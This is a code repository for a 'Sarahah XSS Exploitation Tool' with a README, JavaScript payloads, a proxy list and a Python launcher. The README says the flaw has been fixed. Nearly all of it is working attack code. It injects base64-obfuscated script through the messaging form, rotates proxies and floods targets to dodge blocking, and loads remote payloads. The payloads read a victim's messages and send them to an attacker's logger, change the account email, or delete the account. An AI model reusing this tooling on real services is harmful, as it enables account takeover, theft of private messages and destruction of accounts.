├── README.md ├── exploits ├── accountdelete.js ├── emailchange.js └── readmessage.js ├── log.php ├── proxy.lst └── sarahah.py /README.md: -------------------------------------------------------------------------------- 1 | # Sarahah XSS Exploitation Tool 2 | 3 | The tool was able to: 4 | 5 | 1. Read Victim's Messages 6 | 2. Change Victim's Email 7 | 3. Delte Victim's Account 8 | 9 | Note: The vulnerability was reported and is now fixed. 10 | 11 | Article: www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html 12 | Video: https://www.youtube.com/watch?v=dTv5G2ciZ6E 13 | 14 | [![Sarahah XSS Exploitation Tool](https://img.youtube.com/vi/dTv5G2ciZ6E/0.jpg)](https://www.youtube.com/watch?v=dTv5G2ciZ6E) 15 | -------------------------------------------------------------------------------- /exploits/accountdelete.js: -------------------------------------------------------------------------------- 1 | /* 2 | ____ _ _ 3 | / ___| __ _ _ __ __ _| |__ __ _| |__ 4 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 5 | ___) | (_| | | | (_| | | | | (_| | | | | 6 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 7 | Sarahah XSS Exploitation Script 8 | Coded by Shawar Khan ( www.shawarkhan.com ) 9 | */ 10 | // Account Delete Exploit Code 11 | // Params Required: None 12 | 13 | document.getElementsByClassName('col-xs-3')[0].innerHTML=""; 14 | function d4rk(){; 15 | var MyIFrame = document.getElementById("myframe"); 16 | var MyIFrameDoc = (MyIFrame.contentWindow || MyIFrame.contentDocument); 17 | MyIFrameDoc = MyIFrameDoc.document; 18 | MyIFrameDoc.forms[1].submit(); 19 | MyIFrame.onload=null;} 20 | -------------------------------------------------------------------------------- /exploits/emailchange.js: -------------------------------------------------------------------------------- 1 | /* 2 | ____ _ _ 3 | / ___| __ _ _ __ __ _| |__ __ _| |__ 4 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 5 | ___) | (_| | | | (_| | | | | (_| | | | | 6 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 7 | Sarahah XSS Exploitation Script 8 | Coded by Shawar Khan ( www.shawarkhan.com ) 9 | */ 10 | // Email Change Exploit code 11 | // Params Required: email 12 | 13 | document.getElementsByClassName('col-xs-3')[0].innerHTML=""; 14 | function d4rk(){; 15 | var MyIFrame = document.getElementById("myframe"); 16 | var MyIFrameDoc = (MyIFrame.contentWindow || MyIFrame.contentDocument); 17 | MyIFrameDoc = MyIFrameDoc.document; 18 | MyIFrameDoc.getElementsByClassName('form-control')[1]['value'] = email; 19 | MyIFrameDoc.getElementsByClassName('form-horizontal')[0].submit(); 20 | MyIFrame.onload=null;} 21 | -------------------------------------------------------------------------------- /exploits/readmessage.js: -------------------------------------------------------------------------------- 1 | /* 2 | ____ _ _ 3 | / ___| __ _ _ __ __ _| |__ __ _| |__ 4 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 5 | ___) | (_| | | | (_| | | | | (_| | | | | 6 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 7 | Sarahah XSS Exploitation Script 8 | Coded by Shawar Khan ( www.shawarkhan.com ) 9 | */ 10 | // Message Capturing Exploit Code 11 | // Params Required: username,logger 12 | 13 | for(var i=0;i<10;i++){ 14 | var xhr = new XMLHttpRequest(); 15 | var url = 'https://'+document.domain+'/Messages/GetReceivedMessagePage?page='+i 16 | console.log(url); 17 | xhr.open('GET', url, true); 18 | xhr.onload = function () { 19 | var data = 'message='+this.responseText; 20 | if(this.responseText!='[]'){ 21 | var xhr1 = new XMLHttpRequest(); 22 | xhr1.open('POST',logger+'?username='+username); 23 | xhr1.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); 24 | xhr1.onload=function(){ 25 | console.log(':)'); 26 | }; 27 | xhr1.send(data); }; 28 | } 29 | xhr.send(); 30 | } 31 | -------------------------------------------------------------------------------- /log.php: -------------------------------------------------------------------------------- 1 | 12 | -------------------------------------------------------------------------------- /proxy.lst: -------------------------------------------------------------------------------- 1 | 163.172.163.140:3128 2 | 149.56.46.234:8080 3 | 77.81.229.6:8080 4 | 62.138.16.87:3128 5 | 203.74.4.7:80 6 | 203.74.4.2:80 7 | 203.74.4.3:80 8 | 219.76.4.12:88 9 | 77.81.229.6:8080 10 | 5.135.195.166:3128 11 | 123.30.238.16:3128 12 | -------------------------------------------------------------------------------- /sarahah.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | print "[+] Importing Modules..." 3 | import json 4 | import sys 5 | import requests 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 8 | import glob 9 | from base64 import b64encode 10 | import os 11 | import urllib 12 | import ssl 13 | import cookielib 14 | import urllib2 15 | try: 16 | print " Importing BeautifulSoup module..." 17 | from BeautifulSoup import BeautifulSoup 18 | except ImportError: 19 | from bs4 import BeautifulSoup 20 | 21 | if os.name=='nt': 22 | os.system('cls') 23 | else: 24 | os.system('clear') 25 | 26 | print ''' 27 | ____ _ _ 28 | / ___| __ _ _ __ __ _| |__ __ _| |__ 29 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 30 | ___) | (_| | | | (_| | | | | (_| | | | | 31 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 32 | Sarahah XSS Exploitation Script 33 | Author: Shawar Khan ( www.shawarkhan.com ) 34 | 35 | [+] Select Option:\n\n 1. Read Victim\'s Messages\n 2. Change Victim\'s Email\n 3. Delete Victim\'s Account\n 4. View Captured Messages\n 36 | ''' 37 | 38 | def capturedmessages(): 39 | users = [] 40 | for file in glob.glob("*.txt"): 41 | users.append(file.split('.')[0]) 42 | print '\n[+] Messages Available:\n' 43 | for i in users: 44 | print ' > '+i 45 | username = raw_input('\n[+] Enter Username: ') 46 | file = username+'.txt' 47 | print '[+] Loading Messages of "%s"\n'%username 48 | f = open(file).readlines() 49 | for i in f: 50 | data = json.loads(f[0].split('--- ')[1][1:-2]) 51 | print ' Message: %s\n Date : %s\n'%(data['text'],data['dateSent']) 52 | 53 | def exploit(exploitname,user,email,logpath=''): 54 | exploits = {"messageread":'var username="%s";var logger="%s";var script = document.createElement("script");script.src = atob("aHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9zaGF3YXJraGFuZXRoaWNhbGhhY2tlci9TYXJhaGFoLVhTUy1FeHBsb2l0L21hc3Rlci9leHBsb2l0Y29kZS9yZWFkbWVzc2FnZS5qcw==");document.getElementsByTagName("body")[0].appendChild(script);'%(user,logpath), 55 | "emailchange":'var email=atob("%s");var script = document.createElement("script");script.src = atob("aHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9zaGF3YXJraGFuZXRoaWNhbGhhY2tlci9TYXJhaGFoLVhTUy1FeHBsb2l0L21hc3Rlci9leHBsb2l0Y29kZS9lbWFpbGNoYW5nZS5qcw==");document.getElementsByTagName("body")[0].appendChild(script);'%b64encode(email), 56 | "accountdelete":'var script = document.createElement("script");script.src = atob("aHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9zaGF3YXJraGFuZXRoaWNhbGhhY2tlci9TYXJhaGFoLVhTUy1FeHBsb2l0L21hc3Rlci9leHBsb2l0Y29kZS9hY2NvdW50ZGVsZXRlLmpz");document.getElementsByTagName("body")[0].appendChild(script);'} 57 | return ''%b64encode(exploits[exploitname]) 58 | 59 | def sendexploit(exploitcode,victim): 60 | 61 | heds = {"User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"} 62 | r = requests.get('https://'+victim+'.sarahah.com',verify=False, headers=heds) 63 | s = requests.Session() 64 | 65 | sourcecode = r.text 66 | cookies=r.headers['Set-Cookie'] 67 | parsed_html = BeautifulSoup(sourcecode) 68 | csrftoken = str(parsed_html.body.findAll('script')[4]).split('\n')[25].split('=')[3].split('"')[1] 69 | userid = parsed_html.body.find('input', attrs={'id':'RecipientId'})['value'] 70 | if 'User Not Found' in sourcecode: 71 | print "[+] User Not Found!" 72 | exit() 73 | else: 74 | print "[+] User Found!" 75 | print "[+] Sending Payload..." 76 | proxies = open('proxy.lst','r').read().splitlines() 77 | import json 78 | exploitstatus='' 79 | blockedproxies = [] 80 | for i in range(0,25): 81 | 82 | heds1 = {"User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0", 83 | "X-Requested-With":"XMLHttpRequest", 84 | "Cookie":cookies} 85 | 86 | print 'Request:',i 87 | reqs = 'none' 88 | for proxy1 in proxies: 89 | #print "\nUsing proxy",proxy1 90 | #print blockedproxies 91 | if proxy1 not in blockedproxies: 92 | if reqs == 'done': 93 | # print "Request was successfully sent!" 94 | break 95 | try: 96 | ip = {'http':'http://'+str(proxy1),'https':'https://'+str(proxy1)} 97 | if exploitstatus == '': 98 | #print exploitcode 99 | #print 'Sending Request' 100 | postdata = {"__RequestVerificationToken":csrftoken,"userId":userid,"text":exploitcode,"captchaResponse":""} 101 | posturl = requests.post('https://'+victim+'.sarahah.com/Messages/SendMessage',verify=False,proxies=ip,headers=heds1,data=postdata) 102 | sourcecode2 = posturl.text 103 | #print "Printing Sourcecode" 104 | print sourcecode2 105 | if "Done" in sourcecode2: 106 | reqs = 'done' 107 | exploitstatus = 'sent' 108 | print '[+] Payload Sent!' 109 | print '[+] Flooding Victim for payload execution...' 110 | print '[i] This may take a while...' 111 | else: 112 | blockedproxies.append(proxy1) 113 | #print 'Proxy %s Blocked'%proxy1 114 | #print blockedproxies 115 | pass 116 | else: 117 | postdata = {"__RequestVerificationToken":csrftoken,"userId":userid,"text":":)","captchaResponse":""} 118 | posturl = requests.post('https://'+victim+'.sarahah.com/Messages/SendMessage',verify=False,proxies=ip,headers=heds1,data=postdata) 119 | sourcecode2 = posturl.text 120 | print sourcecode2 121 | if "Done" in sourcecode2: 122 | reqs = 'done' 123 | else: 124 | blockedproxies.append(proxy1) 125 | except Exception as e: 126 | #print e 127 | pass 128 | else: 129 | #print "Proxy %s Ignored!"%proxy1 130 | pass 131 | print "[+] User Successfully Flooded & Payload Sent." 132 | print "[i] Keep your logger running, wait for user to scroll and you'll get the logs." 133 | 134 | 135 | def readmessageexploit(): 136 | username = raw_input("[+] Enter Victim Username > ") 137 | loger = raw_input("[+] Enter Path to Logger > ") 138 | #print "[i] Logger is pre-defined 'https://127.0.0.1/log.php'." 139 | sendexploit(exploit('messageread',username,'',loger),username) 140 | 141 | def emailchangeexploit(): 142 | username = raw_input("[+] Enter Victim Username > ") 143 | email = raw_input("[+] Enter New Email > ") 144 | sendexploit(exploit('emailchange',username,email),username) 145 | 146 | def accountdeleteexploit(): 147 | username=raw_input("[+] Enter Victim Username > ") 148 | sendexploit(exploit('accountdelete',username,''),username) 149 | 150 | def menu(): 151 | option = raw_input("[+] Options: 1,2,3,4\n Select Option > ") 152 | if option == "1": 153 | print "Read Victim's Messages" 154 | readmessageexploit() 155 | elif option == "2": 156 | emailchangeexploit() 157 | elif option == "3": 158 | accountdeleteexploit() 159 | elif option == "4": 160 | capturedmessages() 161 | else: 162 | print "[!] Invalid Option Selected!" 163 | menu() 164 | menu() --------------------------------------------------------------------------------